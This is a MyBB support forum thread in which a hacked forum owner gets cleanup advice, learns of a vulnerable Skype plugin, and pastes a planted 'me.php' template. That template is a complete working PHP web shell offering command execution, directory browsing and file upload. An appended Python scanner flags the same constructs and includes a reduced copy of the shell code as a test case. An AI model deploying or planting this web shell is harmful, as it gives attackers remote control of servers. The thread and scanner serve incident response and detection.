MyBB Community Forums

Full Version: Repair after hacked ?
My forum was hacked early this morning. I was able to put a backup of the Home Directory and MySQL Database in. The forums seem to work again but I cannot get into the admin CP. I get this when I try:
/home/c904128/public_html/inc/languages/english/admin/virustotalscan.lang.php does not exist

Here is my forum http://afksite.clanservers.com/index.php

I know I need to change my passwords and work obviously on some way to prevent this. Any constructive suggestions on preventing this behavior would be greatly appreciated.

UPDATE: I did get into the admin cp now. I am just a few months into MyBB and I am not sure what I need to be looking at to get it all cleaned up. I noticed I have about 3 times as many files showing Changed in the File Verification portion of the admin cp now. How do I know what is infected?
The best thing to do is just reupload all the files that say Changed. At least you'd be safe even if you have to remake some edits.
....
(2013-01-06, 06:26 PM)dragonexpert Wrote: The best thing to do is just reupload all the files that say Changed. At least you'd be safe even if you have to remake some edits.

(2013-01-06, 06:44 PM)Mr.White Wrote: As dragonexpert suggested, simply replace the changed files.

If you want to tighten up security, I'd suggest reading this: http://community.mybb.com/thread-131553-...53189.html

Thank you both. I have been banning at least 2 users a day and they always seem to turn themselves into admins. I even have the Registration set to Administrator Activation and they still create accounts. I will gladly start implementing changes as per the suggestions offered here.
Check into your plugins. Skype just had a 0day which gave users instant admin access.

Also, the games plugin was recently updated so check to make sure you have the newest version.

Check into your mybb version and make sure it is up to date. Double check all your plugins.
(2013-01-07, 06:34 AM)vEconomy Wrote: Check into your plugins. Skype just had a 0day which gave users instant admin access.

Also, the games plugin was recently updated so check to make sure you have the newest version.

Check into your mybb version and make sure it is up to date. Double check all your plugins.
What Skype mod are you people talking about?

edit: This? - http://mods.mybb.com/view/user-profile-skype-id

A Google search does indicate some exploit in it.
crazy: Yeah, ZEJ had someone point that rather nasty vulnerability out a week ago. Luckily he didn't actually want to cause any damage and just wanted to point it out to us.
If people are giving themselves instant admin access then either you're being hosted off a server with absolutely no security or there's an exploit in one of your plugins.

Make sure you're running the latest version of MyBB and running all the latest versions of your plugins too.
(2013-01-07, 12:48 PM)Criot. Wrote: If people are giving themselves instant admin access then either you're being hosted off a server with absolutely no security or there's an exploit in one of your plugins.

Make sure you're running the latest version of MyBB and running all the latest versions of your plugins too.

Running the latest plugin versions won't help very much if, like the Skype plugin, the latest version has the vulnerability and the author is nowhere to be found.
I uninstalled the Skype plugin. I already uninstalled it from my server so I am not positive on the creator. I did notice there was an "x" in the input field of this plugin on these accounts. Thank you for pointing this out. My PC was down yesterday so I was trying to manage my forum off my cell. Was not the greatest method.

Also I am running the 1.6.9 version of MyBB.

I ran the Check Templates under System Health and received this message "The templates below matched known security issues. Please review them." and it listed one named me.php in Global Templates. I do not see this file in the normal MyBB download. Any ideas where this came from or if it is supposed to be there? I don't have a known clean copy to compare to if it is a legit file.

Here is the code in it
<?php
error_reporting(0);set_magic_quotes_runtime(0);if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="'.$me.'" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>iTSecTeam.com<br>Coded By Pejvak';







?>

I can't thank you guys enough for the help. I really appreciate it.
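A heuristic check for the constructs visible in the me.php code posted above, as an added example that is not part of the original thread and is not MyBB's own Check Templates logic. It flags request input reaching a command-execution or chdir() call (directly or through one assigned variable) and uploads saved under the client-supplied file name; the function name `scan` and both fixtures are assumptions made for illustration.

```python
import re

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# Functions that run OS commands or PHP code, plus chdir() as used in the posted code.
SINKS = ("passthru", "system", "exec", "shell_exec", "popen", "proc_open", "eval", "chdir")
# A variable assigned straight from request input, e.g. $ad=$_REQUEST['ad'];
ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + SUPERGLOBAL)
# A sink call whose first argument is a variable.
CALL = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(\s*(\$\w+)", re.I)
# move_uploaded_file() whose destination is the name field sent by the client.
UPLOAD = re.compile(
    r"move_uploaded_file\s*\(.*?,\s*\$_FILES\s*\[[^\]]+\]\s*\[\s*[\"']name[\"']\s*\]", re.I)


def scan(source):
    """Return (line_number, finding) pairs for request-driven sinks in PHP text."""
    tainted = {"$" + name for name in ASSIGN.findall(source)}
    findings = []
    for number, line in enumerate(source.splitlines(), start=1):
        for func, arg in CALL.findall(line):
            if re.fullmatch(SUPERGLOBAL, arg) or arg in tainted:
                findings.append((number, f"{func.lower()}() called with request input {arg}"))
        if UPLOAD.search(line):
            findings.append((number, "upload stored under client-supplied file name"))
    return findings


# Constructed fixture: statements reduced from the me.php code posted above.
SUSPECT = '''$ad = $_REQUEST['ad'];
if ($ad) { chdir($ad); }
move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);
if ($_GET['cme']) { passthru($_GET['cme']); }
'''

# Constructed fixture: ordinary code that reads request input without reaching a sink.
BENIGN = '''$page = intval($_GET['page']);
move_uploaded_file($_FILES['avatar']['tmp_name'], $dir . '/' . $safe_name);
'''

if __name__ == "__main__":
    for number, finding in scan(SUSPECT):
        print(f"line {number}: {finding}")
    print("benign findings:", scan(BENIGN))
```

The check follows only one level of assignment and works on plain text, so obfuscated or encoded code will not match; it can be run over exported template bodies as well as files on disk.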